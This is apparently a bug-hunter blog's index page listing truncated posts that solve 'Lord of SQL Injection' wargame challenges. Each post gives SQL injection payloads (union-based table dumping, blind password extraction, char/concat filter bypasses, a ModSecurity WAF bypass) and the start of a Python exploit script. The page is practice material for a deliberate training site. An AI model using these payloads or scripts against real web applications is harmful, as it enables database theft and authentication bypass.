HACKINTOANETWORK

WEB APPLICATION BUG HUNTER, PENETRATION TESTER

Wargame/Lord of SQL Injection

Prob Payload pw=' union select sql from sqlite_master limit 1,1--%20 pw=' union select flag_0876285c from flag_70c81d99--%20 Exploit import requests from bs4 import BeautifulSoup url = "https://los.rubiya.kr/chall/poltergeist_a62c7abc7e6ce0080dbf0e14a07d1f1d.php?" cookie = {'PHPSESSID':'o8k4eis6nm0q904ajkf4t2aiva'} def tbl_name_and_col_name(): query = "pw=' union select sql from sqlite_master li..

2022. 10. 25.

Wargame/Lord of SQL Injection

Prob Payload pw=' or id='admin' and length(pw)=8--%20 pw=' or id='admin' and unicode(substr(pw,1,1))=48--%20 Exploit import requests import string url = "https://los.rubiya.kr/chall/banshee_ece938c70ea2419a093bb0be9f01a7b1.php?" cookie = {'PHPSESSID':'l76vhg3a57sh6gnch2itdmvsoj'} def pw_length(): pw_len = 0 while True: pw_len += 1 query = "pw=' or id='admin' and length(pw)={}-- ".format(pw_len) ..

2022. 10. 25.

Wargame/Lord of SQL Injection

Prob Payload id=' or id=char(97)||char(100)||char(109)||char(105)||char(110)--%20 Exploit import requests url = "https://los.rubiya.kr/chall/manticore_f88f07d899ad0fc8738fe3aaacff9974.php?" cookie = {'PHPSESSID':'l76vhg3a57sh6gnch2itdmvsoj'} def solve(): query = "id=' or id=char(97)||char(100)||char(109)||char(105)||char(110)-- " res = requests.get(url=url+query, cookies=cookie) if "MANTICORE Cl..

2022. 10. 25.

Wargame/Lord of SQL Injection

Prob Payload id=admin%27%20--%20 Exploit import requests url = "https://los.rubiya.kr/chall/chupacabra_8568ab6205bea61d634a8cc67484a35c.php?" cookie = {'PHPSESSID':'l76vhg3a57sh6gnch2itdmvsoj'} def solve(): query = "id=admin%27%20--%20" res = requests.get(url=url+query, cookies=cookie) if "CHUPACABRA Clear!" in res.text: print("CHUPACABRA Clear!") if __name__ == "__main__": solve()

2022. 10. 25.

Wargame/Lord of SQL Injection

Prob Payload Payload - URL Encode id=%27%3C%40%3D1%20union%2F**%2Fselect%20%27first%27%2C%27second%27%23 Exploit import requests url = "https://modsec.rubiya.kr/chall/cyclops_9d6a565d1cb6c38a06a6b0815344e29e.php?" cookie = {'PHPSESSID':'l76vhg3a57sh6gnch2itdmvsoj'} def solve(): query = "id='

2022. 10. 23.

Wargame/Lord of SQL Injection

Prob Payload Payload - URL Encode pw=%27%3C%40%3D1%20or%20id%3D%27admin%27%20and%20length(pw)%3D8%23 pw=%27%3C%40%3D1%20or%20id%3D%27admin%27%20and%20ascii(substr(pw%2C1%2C1))%3D97%23 Exploit import requests import string url = "https://modsec.rubiya.kr/chall/godzilla_799f2ae774c76c0bfd8429b8d5692918.php?" cookie = {'PHPSESSID':'l76vhg3a57sh6gnch2itdmvsoj'} def pw_length(): pw_len = 0 while True..

2022. 10. 23.

Wargame/Lord of SQL Injection

Prob Payload Payload - URL Encode id=%27%3C%40%3D1%20or%20id%3Dconcat(%27a%27%2C%27dmin%27)--%20 Exploit import requests url = "https://modsec.rubiya.kr/chall/death_0128e8a86066ca4f148444f0e99f4707.php?" cookie = {'PHPSESSID':'s93536osgfmtdaqp4b5lpnt7p9'} def solve(): query = "id=%27%3C%40%3D1%20or%20id%3Dconcat(%27a%27%2C%27dmin%27)--%20" res = requests.get(url=url+query,cookies=cookie) if "DEA..

2022. 10. 15.

Wargame/Lord of SQL Injection

Prob Payload Payload - URL Encode id=%27%3C%40%3D1%20or%201--%20 Exploit import requests url = "https://modsec.rubiya.kr/chall/cthulhu_c26ae41c4af4c2d7b21c19cbb9009604.php?" cookie = {'PHPSESSID':'pug9dnqndkn502s09mds1uiu9o'} def solve(): query = "id=%27%3C%40%3D1%20or%201--%20" res = requests.get(url=url+query,cookies=cookie) if "CTHULHU Clear!" in res.text: print("CTHULHU Clear!") if __name__ ..

2022. 10. 14.